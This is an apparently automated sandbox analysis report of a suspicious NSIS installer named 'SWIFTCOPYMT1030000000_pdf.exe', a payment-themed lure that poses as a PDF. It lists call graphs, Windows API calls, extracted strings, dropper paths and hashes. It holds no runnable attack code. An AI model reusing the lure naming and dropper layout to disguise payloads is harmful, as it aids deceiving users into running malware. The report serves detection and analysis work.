4528->4545 4529 403e12 DestroyWindow EndDialog 4529->4524 4533 403eee 8 API calls 4530->4533 4535 403a87 4531->4535 4536 403a6a SendMessageA IsWindowEnabled 4531->4536 4532->4523 4533->4523 4534->4523 4538 403a94 4535->4538 4539 403adb SendMessageA 4535->4539 4540 403aa7 4535->4540 4549 403a8c 4535->4549 4536->4523 4536->4535 4537 405b99 18 API calls 4537->4545 4538->4539 4538->4549 4539->4530 4542 403ac4 4540->4542 4543 403aaf 4540->4543 4541 403e60 SendMessageA 4544 403ac2 4541->4544 4547 40140b 2 API calls 4542->4547 4546 40140b 2 API calls 4543->4546 4544->4530 4545->4523 4545->4528 4545->4529 4545->4537 4548 403e87 19 API calls 4545->4548 4551 403e87 19 API calls 4545->4551 4566 403d52 DestroyWindow 4545->4566 4546->4549 4550 403acb 4547->4550 4548->4545 4549->4541 4550->4530 4550->4549 4552 403c3f GetDlgItem 4551->4552 4553 403c54 4552->4553 4554 403c5c ShowWindow KiUserCallbackDispatcher 4552->4554 4553->4554 4575 403ea9 KiUserCallbackDispatcher 4554->4575 4556 403c86 EnableWindow 4559 403c9a 4556->4559 4557 403c9f GetSystemMenu EnableMenuItem SendMessageA 4558 403ccf SendMessageA 4557->4558 4557->4559 4558->4559 4559->4557 4576 403ebc SendMessageA 4559->4576 4577 405b77 lstrcpynA 4559->4577 4562 403cfd lstrlenA 4563 405b99 18 API calls 4562->4563 4564 403d0e SetWindowTextA 4563->4564 4565 401389 2 API calls 4564->4565 4565->4545 4566->4524 4567 403d6c CreateDialogParamA 4566->4567 4567->4524 4568 403d9f 4567->4568 4569 403e87 19 API calls 4568->4569 4570 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4569->4570 4571 401389 2 API calls 4570->4571 4572 403df0 4571->4572 4572->4523 4573 403df8 ShowWindow 4572->4573 4574 403ed3 SendMessageA 4573->4574 4574->4524 4575->4556 4576->4559 4577->4562 4582 402036 4583 402a07 18 API calls 4582->4583 4584 40203d 4583->4584 4585 402a07 18 API calls 4584->4585 4586 402047 4585->4586 4587 402a07 18 API calls 4586->4587 4588 402050 4587->4588 4589 402a07 18 API calls 4588->4589 4590 40205a 4589->4590 4591 402a07 18 API calls 4590->4591 4592 402064 4591->4592 4593 402078 CoCreateInstance 4592->4593 4594 402a07 18 API calls 4592->4594 4597 402097 4593->4597 4598 40214d 4593->4598 4594->4593 4595 401423 25 API calls 4596 40217f 4595->4596 4597->4598 4599 40212c MultiByteToWideChar 4597->4599 4598->4595 4598->4596 4599->4598 5381 4014b7 5382 4014bd 5381->5382 5383 401389 2 API calls 5382->5383 5384 4014c5 5383->5384 5385 10002977 5386 1000298f 5385->5386 5387 10001551 2 API calls 5386->5387 5388 100029aa 5387->5388 4616 402438 4617 402b11 19 API calls 4616->4617 4618 402442 4617->4618 4619 4029ea 18 API calls 4618->4619 4620 40244b 4619->4620 4621 402455 4620->4621 4625 40266d 4620->4625 4622 402462 RegEnumKeyA 4621->4622 4623 40246e RegEnumValueA 4621->4623 4624 402487 RegCloseKey 4622->4624 4623->4624 4623->4625 4624->4625 4627 401bb8 4628 4029ea 18 API calls 4627->4628 4629 401bbf 4628->4629 4630 4029ea 18 API calls 4629->4630 4631 401bc9 4630->4631 4632 401bd9 4631->4632 4633 402a07 18 API calls 4631->4633 4634 401be9 4632->4634 4635 402a07 18 API calls 4632->4635 4633->4632 4636 401bf4 4634->4636 4637 401c38 4634->4637 4635->4634 4638 4029ea 18 API calls 4636->4638 4639 402a07 18 API calls 4637->4639 4640 401bf9 4638->4640 4641 401c3d 4639->4641 4642 4029ea 18 API calls 4640->4642 4643 402a07 18 API calls 4641->4643 4644 401c02 4642->4644 4645 401c46 FindWindowExA 4643->4645 4646 401c28 SendMessageA 4644->4646 4647 401c0a SendMessageTimeoutA 4644->4647 4648 401c64 4645->4648 4646->4648 4647->4648 4649 402239 4650 402241 4649->4650 4651 402247 4649->4651 4652 402a07 18 API calls 4650->4652 4653 402257 4651->4653 4654 402a07 18 API calls 4651->4654 4652->4651 4655 402a07 18 API calls 4653->4655 4657 402265 4653->4657 4654->4653 4655->4657 4656 402a07 18 API calls 4658 40226e WritePrivateProfileStringA 4656->4658 4657->4656 4697 4022be 4698 4022c3 4697->4698 4699 4022ee 4697->4699 4701 402b11 19 API calls 4698->4701 4700 402a07 18 API calls 4699->4700 4702 4022f5 4700->4702 4703 4022ca 4701->4703 4709 402a47 RegOpenKeyExA 4702->4709 4704 4022d4 4703->4704 4708 40230b 4703->4708 4705 402a07 18 API calls 4704->4705 4706 4022db RegDeleteValueA RegCloseKey 4705->4706 4706->4708 4710 402adb 4709->4710 4713 402a72 4709->4713 4710->4708 4711 402a98 RegEnumKeyA 4712 402aaa RegCloseKey 4711->4712 4711->4713 4715 405ea2 3 API calls 4712->4715 4713->4711 4713->4712 4714 402acf RegCloseKey 4713->4714 4716 402a47 3 API calls 4713->4716 4719 402abe 4714->4719 4717 402aba 4715->4717 4716->4713 4718 402aea RegDeleteKeyA 4717->4718 4717->4719 4718->4719 4719->4710 4720 40173f 4721 402a07 18 API calls 4720->4721 4722 401746 4721->4722 4723 401764 4722->4723 4724 40176c 4722->4724 4760 405b77 lstrcpynA 4723->4760 4761 405b77 lstrcpynA 4724->4761 4727 40176a 4730 405de2 5 API calls 4727->4730 4728 401777 4729 405624 3 API calls 4728->4729 4731 40177d lstrcatA 4729->4731 4734 401789 4730->4734 4731->4727 4732 405e7b 2 API calls 4732->4734 4733 4017ca 4735 405800 2 API calls 4733->4735 4734->4732 4734->4733 4737 4017a0 CompareFileTime 4734->4737 4738 401864 4734->4738 4739 40183b 4734->4739 4741 405b77 lstrcpynA 4734->4741 4747 405b99 18 API calls 4734->4747 4756 4053a8 MessageBoxIndirectA 4734->4756 4759 405825 GetFileAttributesA CreateFileA 4734->4759 4735->4734 4737->4734 4740 404e84 25 API calls 4738->4740 4743 404e84 25 API calls 4739->4743 4749 401850 4739->4749 4742 40186e 4740->4742 4741->4734 4744 402e6c 33 API calls 4742->4744 4743->4749 4745 401881 4744->4745 4746 401895 SetFileTime 4745->4746 4748 4018a7 FindCloseChangeNotification 4745->4748 4746->4748 4747->4734 4748->4749 4750 4018b8 4748->4750 4751 4018d0 4750->4751 4752 4018bd 4750->4752 4753 405b99 18 API calls 4751->4753 4754 405b99 18 API calls 4752->4754 4755 4018d8 4753->4755 4757 4018c5 lstrcatA 4754->4757 4758 4053a8 MessageBoxIndirectA 4755->4758 4756->4734 4757->4755 4758->4749 4759->4734 4760->4727 4761->4728 5389 40163f 5390 402a07 18 API calls 5389->5390 5391 401645 5390->5391 5392 405e7b 2 API calls 5391->5392 5393 40164b 5392->5393 5394 40193f 5395 4029ea 18 API calls 5394->5395 5396 401946 5395->5396 5397 4029ea 18 API calls 5396->5397 5398 401950 5397->5398 5399 402a07 18 API calls 5398->5399 5400 401959 5399->5400 5401 40196c lstrlenA 5400->5401 5402 4019a7 5400->5402 5403 401976 5401->5403 5403->5402 5407 405b77 lstrcpynA 5403->5407 5405 401990 5405->5402 5406 40199d lstrlenA 5405->5406 5406->5402 5407->5405

                                      Executed Functions

                                      Function 004030EF Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 324stringfilecomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4030ef-403186 #17 SetErrorMode OleInitialize call 405ea2 SHGetFileInfoA call 405b77 GetCommandLineA call 405b77 GetModuleHandleA 7 403192-4031a7 call 40564f CharNextA 0->7 8 403188-40318d 0->8 11 403267-40326b 7->11 8->7 12 403271 11->12 13 4031ac-4031af 11->13 16 403284-40329e GetTempPathA call 4030bb 12->16 14 4031b1-4031b5 13->14 15 4031b7-4031bf 13->15 14->14 14->15 17 4031c1-4031c2 15->17 18 4031c7-4031ca 15->18 26 4032a0-4032be GetWindowsDirectoryA lstrcatA call 4030bb 16->26 27 4032f6-403310 DeleteFileA call 402c33 16->27 17->18 20 4031d0-4031d4 18->20 21 403257-403264 call 40564f 18->21 24 4031d6-4031dc 20->24 25 4031e7-403214 20->25 21->11 36 403266 21->36 30 4031e2 24->30 31 4031de-4031e0 24->31 32 403216-40321c 25->32 33 403227-403255 25->33 26->27 44 4032c0-4032f0 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 26->44 41 4033a4-4033b3 call 403548 OleUninitialize 27->41 42 403316-40331c 27->42 30->25 31->25 31->30 38 403222 32->38 39 40321e-403220 32->39 33->21 35 403273-40327f call 405b77 33->35 35->16 36->11 38->33 39->33 39->38 55 4033b9-4033c9 call 4053a8 ExitProcess 41->55 56 4034ad-4034b3 41->56 45 403394-40339b call 403622 42->45 46 40331e-403329 call 40564f 42->46 44->27 44->41 53 4033a0 45->53 59 40332b-403354 46->59 60 40335f-403369 46->60 53->41 57 403530-403538 56->57 58 4034b5-4034d2 call 405ea2 * 3 56->58 63 40353a 57->63 64 40353e-403542 ExitProcess 57->64 89 4034d4-4034d6 58->89 90 40351c-403527 ExitWindowsEx 58->90 65 403356-403358 59->65 66 40336b-403378 call 405712 60->66 67 4033cf-4033e9 lstrcatA lstrcmpiA 60->67 63->64 65->60 70 40335a-40335d 65->70 66->41 80 40337a-403390 call 405b77 * 2 66->80 67->41 72 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 75 403402-403408 call 405b77 72->75 76 40340d-403435 call 405b77 72->76 75->76 85 40343b-403457 call 405b99 DeleteFileA 76->85 80->45 95 403498-40349f 85->95 96 403459-403469 CopyFileA 85->96 89->90 94 4034d8-4034da 89->94 90->57 93 403529-40352b call 40140b 90->93 93->57 94->90 98 4034dc-4034ee GetCurrentProcess 94->98 95->85 99 4034a1-4034a8 call 405a2b 95->99 96->95 100 40346b-40348b call 405a2b call 405b99 call 405347 96->100 98->90 104 4034f0-403512 98->104 99->41 100->95 112 40348d-403494 CloseHandle 100->112 104->90 112->95
                                      APIs
                                      • #17.COMCTL32 ref: 00403110
                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000), ref: 00403172
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B2
                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032E7
                                      • DeleteFileA.KERNELBASE(1033), ref: 004032FB
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                      • String ID: "$"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe$C:\Users\user\udskriftskartotek\chiromancy\refalling$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                      • API String ID: 4107622049-3377797858
                                      • Opcode ID: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                      • Instruction ID: 3931d960d2cecc16523f178db0b803f8d2f925e5e1ab1ff86deffc182e7e2b76
                                      • Opcode Fuzzy Hash: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                      • Instruction Fuzzy Hash: 01B10A709083816EE7116F755C4DA2B7EE8EB86306F04457EF181B62E2C77C9A05CB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404FC2 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 279windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 113 404fc2-404fdd 114 404fe3-4050ac GetDlgItem * 3 call 403ebc call 404722 GetClientRect GetSystemMetrics SendMessageA * 2 113->114 115 40516e-405175 113->115 133 4050ca-4050cd 114->133 134 4050ae-4050c8 SendMessageA * 2 114->134 117 405177-405199 GetDlgItem CreateThread FindCloseChangeNotification 115->117 118 40519f-4051ac 115->118 117->118 120 4051ca-4051d1 118->120 121 4051ae-4051b4 118->121 125 4051d3-4051d9 120->125 126 405228-40522c 120->126 123 4051b6-4051c5 ShowWindow * 2 call 403ebc 121->123 124 4051ec-4051f5 call 403eee 121->124 123->120 137 4051fa-4051fe 124->137 130 405201-405211 ShowWindow 125->130 131 4051db-4051e7 call 403e60 125->131 126->124 128 40522e-405231 126->128 128->124 135 405233-405246 SendMessageA 128->135 138 405221-405223 call 403e60 130->138 139 405213-40521c call 404e84 130->139 131->124 142 4050dd-4050f4 call 403e87 133->142 143 4050cf-4050db SendMessageA 133->143 134->133 144 405340-405342 135->144 145 40524c-40526d CreatePopupMenu call 405b99 AppendMenuA 135->145 138->126 139->138 152 4050f6-40510a ShowWindow 142->152 153 40512a-40514b GetDlgItem SendMessageA 142->153 143->142 144->137 150 405282-405288 145->150 151 40526f-405280 GetWindowRect 145->151 155 40528b-4052a3 TrackPopupMenu 150->155 151->155 156 405119 152->156 157 40510c-405117 ShowWindow 152->157 153->144 154 405151-405169 SendMessageA * 2 153->154 154->144 155->144 158 4052a9-4052c0 155->158 159 40511f-405125 call 403ebc 156->159 157->159 160 4052c5-4052e0 SendMessageA 158->160 159->153 160->160 162 4052e2-405302 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 160->162 163 405304-405324 SendMessageA 162->163 163->163 164 405326-40533a GlobalUnlock SetClipboardData CloseClipboard 163->164 164->144
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00405021
                                      • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                      • GetClientRect.USER32(?,?), ref: 0040506D
                                      • GetSystemMetrics.USER32(00000015), ref: 00405075
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                      • ShowWindow.USER32(?,00000008), ref: 00405111
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                        • Part of subcall function 00403EBC: SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405199
                                      • ShowWindow.USER32(00000000), ref: 004051BD
                                      • ShowWindow.USER32(000103F6,00000008), ref: 004051C2
                                      • ShowWindow.USER32(00000008), ref: 00405209
                                      • SendMessageA.USER32(000103F6,00001004,00000000,00000000), ref: 0040523B
                                      • CreatePopupMenu.USER32 ref: 0040524C
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                      • GetWindowRect.USER32(000103F6,?), ref: 00405274
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                      • OpenClipboard.USER32(00000000), ref: 004052E3
                                      • EmptyClipboard.USER32 ref: 004052E9
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                      • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405329
                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405334
                                      • CloseClipboard.USER32 ref: 0040533A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                      • String ID: Epicurize Setup: Installing${
                                      • API String ID: 4154960007-3782759227
                                      • Opcode ID: 6e337b6c722179ab30ba9d86fe019cb1769816a747b5174ef96660d98cd53fd9
                                      • Instruction ID: 5cc5a493c7826af022734a05619d12b61540e90d3b7798cd1ee4812e4cb533c1
                                      • Opcode Fuzzy Hash: 6e337b6c722179ab30ba9d86fe019cb1769816a747b5174ef96660d98cd53fd9
                                      • Instruction Fuzzy Hash: FDA16C70900208BFEB119F60DC85AAE7F79FB44355F00816AFA05BA1A1C7795E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C33 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 339 402c33-402c81 GetTickCount GetModuleFileNameA call 405825 342 402c83-402c88 339->342 343 402c8d-402cbb call 405b77 call 40566b call 405b77 GetFileSize 339->343 344 402e65-402e69 342->344 351 402cc1 343->351 352 402da8-402db6 call 402bcf 343->352 354 402cc6-402cdd 351->354 358 402db8-402dbb 352->358 359 402e0b-402e10 352->359 356 402ce1-402ce3 call 403072 354->356 357 402cdf 354->357 363 402ce8-402cea 356->363 357->356 361 402dbd-402dce call 4030a4 call 403072 358->361 362 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 358->362 359->344 381 402dd3-402dd5 361->381 362->359 387 402e1c-402e2d 362->387 365 402cf0-402cf7 363->365 366 402e12-402e1a call 402bcf 363->366 371 402d73-402d77 365->371 372 402cf9-402d0d call 4057e0 365->372 366->359 376 402d81-402d87 371->376 377 402d79-402d80 call 402bcf 371->377 372->376 386 402d0f-402d16 372->386 383 402d96-402da0 376->383 384 402d89-402d93 call 405f14 376->384 377->376 381->359 389 402dd7-402ddd 381->389 383->354 388 402da6 383->388 384->383 386->376 392 402d18-402d1f 386->392 393 402e35-402e3a 387->393 394 402e2f 387->394 388->352 389->359 389->362 392->376 395 402d21-402d28 392->395 396 402e3b-402e41 393->396 394->393 395->376 397 402d2a-402d31 395->397 396->396 398 402e43-402e5e SetFilePointer call 4057e0 396->398 397->376 399 402d33-402d53 397->399 402 402e63 398->402 399->359 401 402d59-402d5d 399->401 403 402d65-402d6d 401->403 404 402d5f-402d63 401->404 402->344 403->376 405 402d6f-402d71 403->405 404->388 404->403 405->376
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C44
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,00000400), ref: 00402C60
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00402CAC
                                      Strings
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                      • soft, xrefs: 00402D21
                                      • Null, xrefs: 00402D2A
                                      • Error launching installer, xrefs: 00402C83
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                      • "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe", xrefs: 00402C33
                                      • Inst, xrefs: 00402D18
                                      • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                      • C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-2094975479
                                      • Opcode ID: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                      • Instruction ID: 9cc68cb9a8033aa8cfa9fb84db7bfe2d2ab72e09e198f7c7f71ed61724ba903c
                                      • Opcode Fuzzy Hash: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                      • Instruction Fuzzy Hash: 74510471D40204ABDB209F65DE89B6E7BA8EF40354F14403BFA04B62D1C7BC9E418BAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405B99 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
